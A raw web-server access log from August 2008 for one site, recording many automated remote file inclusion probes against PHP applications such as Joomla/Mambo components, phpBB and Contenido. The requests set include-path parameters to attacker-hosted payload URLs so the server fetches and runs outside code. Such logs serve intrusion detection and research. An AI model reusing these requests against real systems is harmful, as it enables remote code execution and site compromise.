65.55.211.22 - - [18/Aug/2008:11:40:04 -0700] "GET /tmp/sess_5a0fb15777d5f946480331267d91b34d HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:41:31 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:41:39 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:41:40 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:41:40 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:41:40 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:41:52 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:41:53 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:42:30 -0700] "GET /logs/access_080725.log///vwar/backup/errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:42:30 -0700] "GET ///vwar/backup/errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:42:30 -0700] "GET /logs///vwar/backup/errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:11:42:38 -0700] "GET /logs/access_080608.log//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:42:49 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:42:50 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:11:43:11 -0700] "GET /logs/access_080615.log//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:11:43:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10980 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:11:43:15 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.805" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:43:27 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:43:34 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.160.189.11 - - [18/Aug/2008:11:43:44 -0700] "GET /logs/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [18/Aug/2008:11:43:44 -0700] "GET /home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [18/Aug/2008:11:44:00 -0700] "GET /logs/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [18/Aug/2008:11:44:00 -0700] "GET /home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:44:57 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:44:57 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.132 - - [18/Aug/2008:11:46:35 -0700] "GET /SQuery/lib/gore.php?libpath=http://geo.ya.com/v3g3t4/x6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.132 - - [18/Aug/2008:11:46:35 -0700] "GET /logs/access_080808.log/SQuery/lib/gore.php?libpath=http://geo.ya.com/v3g3t4/x6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.132 - - [18/Aug/2008:11:46:35 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://geo.ya.com/v3g3t4/x6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.132 - - [18/Aug/2008:11:47:18 -0700] "GET /logs/access_080105.log/SQuery/lib/gore.php?libpath=http://geo.ya.com/v3g3t4/x6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:47:25 -0700] "GET /logs/access_080706.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:47:26 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:47:26 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:47:34 -0700] "GET /logs/access_080706.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:47:35 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:47:35 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:47:43 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:47:44 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.58.154.237 - - [18/Aug/2008:11:48:30 -0700] "GET /logs/access_080615.log//poll/png.php?include_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [18/Aug/2008:11:48:30 -0700] "GET //poll/png.php?include_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [18/Aug/2008:11:48:30 -0700] "GET /logs//poll/png.php?include_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.68.66 - - [18/Aug/2008:11:48:43 -0700] "GET /logs/access_080708.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [18/Aug/2008:11:48:44 -0700] "GET /logs/access_080606.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:11:49:51 -0700] "GET /logs/access_080808.log//?custompluginfile[]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:11:49:53 -0700] "GET //?custompluginfile[]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 10978 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:11:49:54 -0700] "GET /logs//?custompluginfile[]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 61146 "-" "libwww-perl/5.65" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:50:17 -0700] "GET /logs/access_080415.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:50:20 -0700] "GET /logs/access_080415.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.104.252 - - [18/Aug/2008:11:50:22 -0700] "GET /logs/access_080305.log/12all/admin/cron_pop.php?adm_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.104.252 - - [18/Aug/2008:11:50:22 -0700] "GET /12all/admin/cron_pop.php?adm_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.104.252 - - [18/Aug/2008:11:50:22 -0700] "GET /logs/12all/admin/cron_pop.php?adm_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:11:50:22 -0700] "GET /logs/access_080725.log//?custompluginfile[]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
129.142.67.13 - - [18/Aug/2008:11:51:04 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
129.142.67.13 - - [18/Aug/2008:11:51:05 -0700] "GET //include/write.php?dir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
129.142.67.13 - - [18/Aug/2008:11:51:05 -0700] "GET /logs//include/write.php?dir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.104.252 - - [18/Aug/2008:11:51:15 -0700] "GET /logs/access_080306.log/12all/admin/cron_pop.php?adm_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [18/Aug/2008:11:51:26 -0700] "GET //?custompluginfile[]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 10978 "-" "libwww-perl/5.65" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:52:11 -0700] "GET /logs/access_080809.log/errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:52:11 -0700] "GET /logs/access_080809.log/errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:52:11 -0700] "GET /errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:52:11 -0700] "GET /errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:52:12 -0700] "GET /logs/errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:52:19 -0700] "GET /logs/access_080315.log/errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:52:19 -0700] "GET /logs/access_080315.log/errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.39 - - [18/Aug/2008:11:52:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.39 - - [18/Aug/2008:11:52:37 -0700] "GET /presto/?D=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
129.142.67.13 - - [18/Aug/2008:11:52:38 -0700] "GET //include/write.php?dir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:53:05 -0700] "GET /errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
129.142.67.13 - - [18/Aug/2008:11:53:18 -0700] "GET /logs/access_080108.log//include/write.php?dir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.117.89.191 - - [18/Aug/2008:11:54:44 -0700] "GET /logs/access_080222.log/index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [18/Aug/2008:11:54:46 -0700] "GET /index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 200 10986 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [18/Aug/2008:11:54:47 -0700] "GET /logs/index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:55:01 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:55:02 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:55:12 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:55:13 -0700] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:55:57 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:55:57 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:56:11 -0700] "GET /logs/access_080321.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
204.8.217.2 - - [18/Aug/2008:11:56:17 -0700] "GET /index2.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
204.8.217.2 - - [18/Aug/2008:11:56:18 -0700] "GET /logs/index2.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:11:56:32 -0700] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:11:56:32 -0700] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:11:56:32 -0700] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:11:56:32 -0700] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:11:56:32 -0700] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:11:56:32 -0700] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:11:56:32 -0700] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:11:56:32 -0700] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [18/Aug/2008:11:57:05 -0700] "GET /logs/access_080524.log/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:11:57:08 -0700] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.108.251.138 - - [18/Aug/2008:11:57:09 -0700] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [18/Aug/2008:11:57:14 -0700] "GET /logs/access_080524.log/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.33.53 - - [18/Aug/2008:11:57:22 -0700] "GET /logs/access_080222.log/index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.33.53 - - [18/Aug/2008:11:57:24 -0700] "GET /index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 200 10986 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.33.53 - - [18/Aug/2008:11:57:24 -0700] "GET /logs/index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:57:28 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:57:28 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.33.53 - - [18/Aug/2008:11:57:58 -0700] "GET /logs/access_080330.log/index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
141.89.66.2 - - [18/Aug/2008:11:58:13 -0700] "GET /logs/access_080215.log//index.php?p=http://www.inf.ufes.br/~pet/topcom6/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.89.66.2 - - [18/Aug/2008:11:58:13 -0700] "GET /logs//index.php?p=http://www.inf.ufes.br/~pet/topcom6/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.89.66.2 - - [18/Aug/2008:11:58:14 -0700] "GET //index.php?p=http://www.inf.ufes.br/~pet/topcom6/response.txt???? HTTP/1.1" 200 10989 "-" "libwww-perl/5.805" "www.dmulk.com"
212.117.89.191 - - [18/Aug/2008:11:58:45 -0700] "GET /logs/access_080420.log/index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.189.11 - - [18/Aug/2008:12:01:17 -0700] "GET /logs/access_080717.log/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [18/Aug/2008:12:01:18 -0700] "GET /logs/access_080717.log/home.php?content=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
129.142.67.13 - - [18/Aug/2008:12:01:22 -0700] "GET /logs//include/write.php?dir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
129.142.67.13 - - [18/Aug/2008:12:01:22 -0700] "GET //include/write.php?dir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.222.106 - - [18/Aug/2008:12:01:52 -0700] "GET /logs/index.php?go=http://museo.infoitos.com//components/com_rwcards/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.222.106 - - [18/Aug/2008:12:01:52 -0700] "GET /logs/access_080226.log/index.php?go=http://museo.infoitos.com//components/com_rwcards/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.222.106 - - [18/Aug/2008:12:01:55 -0700] "GET /index.php?go=http://museo.infoitos.com//components/com_rwcards/id.txt?%0D?? HTTP/1.1" 200 11006 "-" "libwww-perl/5.808" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:12:02:28 -0700] "GET /logs/errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:12:02:28 -0700] "GET /errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:02:37 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:02:37 -0700] "GET //include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:12:02:37 -0700] "GET /logs/access_080725.log//include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:12:02:38 -0700] "GET /logs/access_080608.log//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:12:02:51 -0700] "GET /logs/errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:12:02:52 -0700] "GET /errors.php?error=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.86.110.83 - - [18/Aug/2008:12:03:12 -0700] "GET /logs/access_080222.log/index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.86.110.83 - - [18/Aug/2008:12:03:13 -0700] "GET /index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 200 10986 "-" "libwww-perl/5.803" "www.dmulk.com"
88.86.110.83 - - [18/Aug/2008:12:03:14 -0700] "GET /logs/index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.86.110.83 - - [18/Aug/2008:12:03:18 -0700] "GET /logs/access_080330.log/index.php?oldal=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.18.5.72 - - [18/Aug/2008:12:03:26 -0700] "GET //include/admin.lib.inc.php?site_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
